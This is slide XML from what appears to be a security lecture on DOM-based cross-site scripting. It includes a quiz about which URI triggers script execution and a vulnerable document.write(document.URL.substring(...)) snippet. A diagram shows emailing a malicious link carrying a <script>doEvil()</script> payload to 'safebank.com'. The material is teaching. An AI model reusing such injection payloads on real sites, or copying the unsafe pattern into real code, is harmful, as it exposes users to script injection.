            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://safebank.com/welcome.php?name=&lt;scrip</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>t&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2133" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>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8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1617813"/>
            <a:ext cx="9740053" cy="1791943"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the same </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>example, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>which one of the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>following </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>URIs </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>will </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-707" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cause</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> execution?</a:t>
            </a:r>
            <a:endParaRPr sz="3200">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1032908">
              <a:spcBef>
                <a:spcPts val="367"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Hello</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1032908"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2572680" y="450262"/>
            <a:ext cx="7044267" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-73" dirty="0"/>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-40" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>0:</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Dom</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Based</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-33" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t>XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1747520" y="3402584"/>
          <a:ext cx="8761306" cy="1103374"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{2D5ABB26-0587-4C30-8999-92F81FD0307C}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1133687">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="4547447">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3080172">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="371856">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="2075"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>var</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-25" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>pos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>document.URL.indexOf</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="818181"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>"name="</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>)+</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-5" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5"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0"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="365759">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="2039"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>document.write</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>document.URL.substring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>pos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>document.URL.length</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-10" dirty="0">
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>));</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:solidFill>
                      <a:srgbClr val="F2F4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65759">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="2039"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" spc="-10" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:latin typeface="Calibri"/>
                          <a:cs typeface="Calibri"/>
                        </a:rPr>
                        <a:t>&lt;/script&gt;</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Calibri"/>
                        <a:cs typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnR w="53975">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                    </a:lnR>
                  </a:tcPr>
                </a:tc>
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr sz="2300">
                        <a:latin typeface="Times New Roman"/>
                        <a:cs typeface="Times New Roman"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0">
                    <a:lnL w="53975">
                      <a:solidFill>
                        <a:srgbClr val="FFFFFF"/>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3" name="object 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4" name="object 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5" name="object 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8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3643544" y="333396"/>
            <a:ext cx="4902200" cy="920830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="5867" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DOM-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-127" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9215228" y="3877902"/>
            <a:ext cx="1172355" cy="1542575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1932066" y="1440405"/>
            <a:ext cx="1998980" cy="2860887"/>
            <a:chOff x="1449049" y="1080303"/>
            <a:chExt cx="1499235" cy="2145665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>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000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>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000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="13" name="object 13"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2211882" y="1080303"/>
              <a:ext cx="736066" cy="808859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2948466" y="2289212"/>
            <a:ext cx="5058833" cy="1014807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="662923" marR="2086981" indent="318339">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1. Send </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Email </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1600" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>safebank.com/welcome.php?query=&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367131" y="4396783"/>
            <a:ext cx="2479885" cy="1191259"/>
            <a:chOff x="275348" y="3297587"/>
            <a:chExt cx="1859914" cy="893444"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275348" y="3297587"/>
              <a:ext cx="683679" cy="683672"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="17" name="object 17"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="936193" y="3342475"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="object 18"/>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19" name="object 19"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="897636" y="3459480"/>
              <a:ext cx="1237487" cy="731519"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3482556"/>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21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3482556"/>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22" name="object 22"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1053081" y="3707878"/>
              <a:ext cx="964691" cy="169163"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>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24" name="object 24"/>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25" name="object 25"/>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3" name="object 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4" name="object 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5" name="object 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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1932066" y="1440405"/>
            <a:ext cx="8455660" cy="3980180"/>
            <a:chOff x="1449049" y="1080303"/>
            <a:chExt cx="6341745" cy="2985135"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="object 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2275839" y="3509035"/>
              <a:ext cx="4620895" cy="6350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4620895" h="6350">
                  <a:moveTo>
                    <a:pt x="0" y="6324"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4620641" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6782084" y="3442525"/>
              <a:ext cx="114935" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="114934" h="133350">
                  <a:moveTo>
                    <a:pt x="190" y="133350"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="114401" y="66509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6911421" y="2908426"/>
              <a:ext cx="879266" cy="1156931"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>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3" name="object 13"/>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4" name="object 14"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2211882" y="1080303"/>
              <a:ext cx="736066" cy="808859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3583284" y="4117959"/>
            <a:ext cx="4708313" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
